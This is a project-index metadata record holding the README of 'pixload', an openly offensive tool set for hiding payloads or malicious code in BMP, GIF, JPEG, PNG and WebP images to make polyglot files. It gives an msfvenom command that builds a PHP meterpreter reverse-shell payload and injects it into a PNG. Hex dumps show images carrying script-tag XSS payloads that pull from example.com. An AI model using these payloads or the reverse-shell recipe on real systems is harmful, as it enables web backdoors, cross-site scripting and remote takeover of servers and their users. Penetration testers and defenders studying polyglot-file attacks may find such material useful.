{"id":13845056,"url":"https://github.com/sighook/pixload","last_synced_at":"2025-05-16T10:06:33.914Z","repository":{"id":41471309,"uuid":"208521934","full_name":"sighook/pixload","owner":"sighook","description":"Image Payload Creating/Injecting tools","archived":false,"fork":false,"pushed_at":"2023-11-30T05:14:13.000Z","size":118,"stargazers_count":1202,"open_issues_count":8,"forks_count":238,"subscribers_count":52,"default_branch":"master","last_synced_at":"2024-10-29T16:58:20.190Z","etag":null,"topics":["backdoor-attacks","hacking-tool","image","image-processing","injection","injector","payload-generator","payloads","web-attack-payloads"],"latest_commit_sha":null,"homepage":"","language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"wtfpl","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sighook.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-09-15T00:41:32.000Z","updated_at":"2024-10-27T17:23:04.000Z","dependencies_parsed_at":"2024-03-08T09:01:27.586Z","dependency_job_id":null,"html_url":"https://github.com/sighook/pixload","commit_stats":null,"previous_names":["chinarulezzz/pixload"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sighook%2Fpixload/manifests","owner_url":"https://repos.ecosyste
.ms/api/v1/hosts/GitHub/owners/sighook","download_url":"https://codeload.github.com/sighook/pixload/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254509476,"owners_count":22082891,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor-attacks","hacking-tool","image","image-processing","injection","injector","payload-generator","payloads","web-attack-payloads"],"created_at":"2024-08-04T17:03:09.210Z","updated_at":"2025-05-16T10:06:33.896Z","avatar_url":"https://github.com/sighook.png","language":"Perl","funding_links":[],"categories":["Perl"],"sub_categories":[],"readme":"# pixload -- Image Payload Creating tools\n\n## DESCRIPTION\n\nSet of tools for ~~hiding backdoors~~ creating/injecting payload into images.\n\nThe following image types are currently supported: BMP, GIF, JPG, PNG, WebP.\n\n#### about\n\nUseful references for better understanding of `pixload` and its use-cases:\n\n- [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)\n\n- [Hacking group using Polyglot images to hide malvertising attacks](https://web.archive.org/web/20190226193728/https://devcondetect.com/blog/2019/2/24/hacking-group-using-polyglot-images-to-hide-malvertsing-attacks)\n\n- [Encoding Web Shells in PNG IDAT chunks](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)\n\n- [An XSS on Facebook via PNGs \u0026 Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n\n- [Revisiting XSS payloads in PNG IDAT 
chunks](https://www.adamlogue.com/revisiting-xss-payloads-in-png-idat-chunks/)\n\nIf you want to encode a payload in such a way that the resulting binary blob is\nboth valid x86 shellcode and a valid image file, I recommend looking\n[here](https://web.archive.org/web/20201008001325/https://warroom.securestate.com/bmp-x86-polyglot/)\nand\n[here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb).\n\n#### msfvenom\n\nIf you want to inject a Metasploit payload, you have to do something like this:\n\n1. Create a Metasploit payload (e.g. PHP).\n```sh\n$ msfvenom -p php/meterpreter_reverse_tcp \\\n\tLHOST=192.168.0.1 LPORT=31337 -f raw 2\u003e/dev/null \u003e payload.php\n```\n\n2. Edit `payload.php` if needed.\n\n3. Inject `payload.php` into the image (e.g. PNG).\n```sh\n$ pixload-png --payload \"$(cat payload.php)\" payload.png\n```\n\n## SETUP\n\n##### Dependencies\n\nThe following Perl modules are required:\n\n  * GD\n\n  * Image::ExifTool\n\n  * String::CRC32\n\nOn `Debian-based` systems install these packages:\n\n```sh\nsudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl\n```\n\nOn `FreeBSD` and `DragonFlyBSD` install these packages:\n```sh\ndoas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32\n```\n\nOn `OSX` please refer to [this workaround](https://github.com/sighook/pixload/issues/3)\n(thnx 2 @iosdec).\n\n##### Build and Install\n\n```sh\nmake install\n```\n\n#### Docker\n\n```sh\ndocker build -t pixload .\ndocker run -v \"$(pwd):/pixload\" -it --rm pixload\n```\n\n## TOOLS\n\n### pixload-bmp\n\n##### Help\n\n```sh\n$ pixload-bmp --help\n```\n\n```\nUsage: pixload-bmp [OPTION]... 
FILE\nHide Payload/Malicious Code in BMP Images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -P, --payload STRING   set payload for injection\n  -v, --version          print version and exit\n  -h, --help             print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. Otherwise, the new one will be created.\n```\n\n##### Example\n\n```sh\n$ pixload-bmp payload.bmp\n```\n\n```\n...... BMP Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.bmp\n\n[\u003e] Injecting payload into payload.bmp\n[✔] Payload was injected successfully\n\npayload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26\n\n00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|\n00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|\n00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;\u003cscript src=/|\n00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com\u003e\u003c/s|\n00000040  63 72 69 70 74 3e 3b                              |cript\u003e;|\n00000047\n```\n\nSee [pixload-bmp(1)](https://github.com/sighook/pixload/blob/master/pixload-bmp.1.pod)\nmanual page for more information.\n\n### pixload-gif\n\n##### Help\n\n```sh\n$ pixload-gif --help\n```\n\n```\nUsage: pixload-gif [OPTION]... 
FILE\nHide payload/malicious code in GIF images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -W, --pixelwidth  INTEGER   (has no effect)\n                              set pixel width for the new image (default: 10799)\n  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)\n  -P, --payload     STRING    set payload for injection\n  -v, --version               print version and exit\n  -h, --help                  print help and exit\n\nThe option -W, --pixelwidth has no effect since pixload-gif rewrites\npixel width bytes with \"/*\" characters, to prepare the polyglot gif image.\n\nIf the output FILE already exists, then the payload will be injected into this\nexisting file. Otherwise, the new one will be created with specified pixels\nwide.\n```\n\n##### Example\n\n```sh\n$ pixload-gif payload.gif\n```\n\n```\n...... GIF Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.gif\n\n[\u003e] Injecting payload into payload.gif\n[✔] Payload was injected successfully\n\npayload.gif: GIF image data, version 87a, 10799 x 32\n\n00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|\n00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . 
.....|\n00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|\n00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|\n00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;\u003cscript src=|\n00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com\u003e\u003c/|\n00000060  73 63 72 69 70 74 3e 3b                           |script\u003e;|\n00000068\n```\nSee [pixload-gif(1)](https://github.com/sighook/pixload/blob/master/pixload-gif.1.pod)\nmanual page for more information.\n\n### pixload-jpg\n\n##### Help\n\n```sh\n$ pixload-jpg --help\n```\n\n```\nUsage: pixload-jpg [OPTION]... FILE\nHide Payload/Malicious Code in JPEG images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -S, --section COM|DQT         set section for payload injection\n  -P, --payload STRING          set payload for injection\n  -v, --version                 print version and exit\n  -h, --help                    print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. Otherwise, the new one will be created.\n```\n\n##### Examples\n\n1. Inject payload into comment section:\n\n```sh\n$ pixload-jpg -S com payload.jpg\n```\n\n```\n..... JPEG Payload Creator/Injector ......\n..........................................\n... 
https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.jpg\n\n[\u003e] Injecting payload into COMMENT\n[✔] Payload was injected successfully\n\npayload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1\n\n00000000  ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |.....%\u003cscript sr|\n00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com\u003e|\n00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |\u003c/script\u003e...C...|\n00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |................|\n00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |................|\n00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|\n0000009e\n```\n\n2. Inject payload into DQT table:\n\n```sh\n$ pixload-jpg -S dqt payload.jpg\n```\n\n```\n..... JPEG Payload Creator/Injector ......\n..........................................\n... 
https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.jpg\n\n[\u003e] Injecting payload into DQT table\n[✔] Payload was injected succesfully\n\npayload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1\n\n00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|\n00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n00000020  01 01 01 01 3c 73 63 72  69 70 74 20 73 72 63 3d  |....\u003cscript src=|\n00000030  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com\u003e\u003c/|\n00000040  73 63 72 69 70 74 3e ff  c2 00 0b 08 00 01 00 01  |script\u003e.........|\n00000050  01 01 11 00 ff c4 00 14  00 01 00 00 00 00 00 00  |................|\n00000060  00 00 00 00 00 00 00 00  00 03 ff da 00 08 01 01  |................|\n00000070  00 00 00 01 3f ff d9 01  01 11 00 ff c4 00 14 00  |....?...........|\n00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|\n0000009e\n```\n\nSee [pixload-jpg(1)](https://github.com/sighook/pixload/blob/master/pixload-jpg.1.pod)\nfor more information.\n\n### pixload-png\n\n##### Help\n\n```sh\n$ pixload-png --help\n```\n\n```\nUsage: pixload-png [OPTION]... FILE\nHide Payload/Malicious Code in PNG Images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -W, --pixelwidth  INTEGER   set pixel width for the new image (default: 32)\n  -H, --pixelheight INTEGER   set pixel height for the new image (default: 32)\n  -P, --payload STRING        set payload for injection\n  -v, --version               print version and exit\n  -h, --help                  print help and exit\n\nIf the output FILE already exists, then payload will be injected into this\nexisting file. 
Else, the new one will be created with specified pixels wide.\n```\n\n##### Example\n\n```sh\n$ pixload-png payload.png\n```\n\n```\n...... PNG Payload Creator/Injector ......\n..........................................\n... https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.png\n\n[\u003e] Injecting payload into payload.png\n\n[+] Chunk size: 13\n[+] Chunk type: IHDR\n[+] CRC: fc18eda3\n[+] Chunk size: 9\n[+] Chunk type: pHYs\n[+] CRC: 952b0e1b\n[+] Chunk size: 25\n[+] Chunk type: IDAT\n[+] CRC: c8a288fe\n[+] Chunk size: 0\n[+] Chunk type: IEND\n\n[\u003e] Inject payload to the new chunk: 'pUnk'\n[✔] Payload was injected successfully\n\npayload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced\n\n00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|\n00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|\n00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|\n00000030  c4 01 95 2b 0e 1b 00 00  00 19 49 44 41 54 48 89  |...+......IDATH.|\n00000040  ed c1 31 01 00 00 00 c2  a0 f5 4f ed 61 0d a0 00  |..1.......O.a...|\n00000050  00 00 6e 0c 20 00 01 c8  a2 88 fe 00 00 00 00 49  |..n. 
..........I|\n00000060  45 4e 44 ae 42 60 82 00  00 00 00 00 00 00 00 00  |END.B`..........|\n00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n*\n000000c0  00 23 50 55 6e 4b 3c 73  63 72 69 70 74 20 73 72  |.#PUnK\u003cscript sr|\n000000d0  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com\u003e|\n000000e0  3c 2f 73 63 72 69 70 74  3e eb fd 2e 9f 00 49 45  |\u003c/script\u003e.....IE|\n000000f0  4e 44                                             |ND|\n000000f2\n```\n\nSee [pixload-png(1)](https://github.com/sighook/pixload/blob/master/pixload-png.1.pod)\nmanual page for more information.\n\n### pixload-webp\n\n##### Help\n\n```sh\n$ pixload-webp --help\n```\n\n```\nUsage: pixload-webp [OPTION]... FILE\nHide payloads/malicious code in WebP images.\n\nMandatory arguments to long options are mandatory for short options too.\n  -P, --payload STRING   set payload for injection\n  -v, --version          print version and exit\n  -h, --help             print help and exit\n\nCurrently, there is no possibility to inject the payload into an existing\nWebP image. Only the new (minimal) WebP image will be created and your\npayload will be injected into. If the output FILE already exists, the\npayload will be injected into the existing image, but this image will be\ncorrupted.\n```\n\n##### Example\n\n```sh\n$ pixload-webp payload.webp\n```\n\n```\n..... WebP Payload Creator/Injector ......\n..........................................\n... 
https://github.com/sighook/pixload ...\n..........................................\n\n[\u003e] Generating output file\n[✔] File saved to: payload.webp\n\n[\u003e] Injecting payload into payload.webp\n[✔] Payload was injected successfully\n\npayload.webp: RIFF (little-endian) data, Web/P image\n\n00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|\n00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|\n00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;\u003cscript s|\n00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|\n00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |\u003e\u003c/script\u003e;|\n0000004b\n```\n\nSee [pixload-webp(1)](https://github.com/sighook/pixload/blob/master/pixload-webp.1.pod)\nmanual page for more information.\n\n## LICENSE\n\nWTFPL version 2.\nSee [LICENSE](https://github.com/sighook/pixload/blob/master/LICENSE)\nfor more information.\n\n## LEGAL DISCLAIMER\n\nThe author does not hold any responsibility for the bad use\nof this tool, remember that attacking targets without prior\nconsent is illegal and punished by law.\n\n## DONATIONS\n\n- BTC: `bc1qj4g98svq6qh3q2ap37v52nsvusa76c3cnmcdmx`\n\n- PAYPAL: `alexandr.savca89@gmail.com`\n\nHighly appreciated.\n\n\n\u003c!-- vim:sw=2:ts=2:sts=2:et:cc=80\nEnd of file. --\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsighook%2Fpixload","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsighook%2Fpixload","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsighook%2Fpixload/lists"}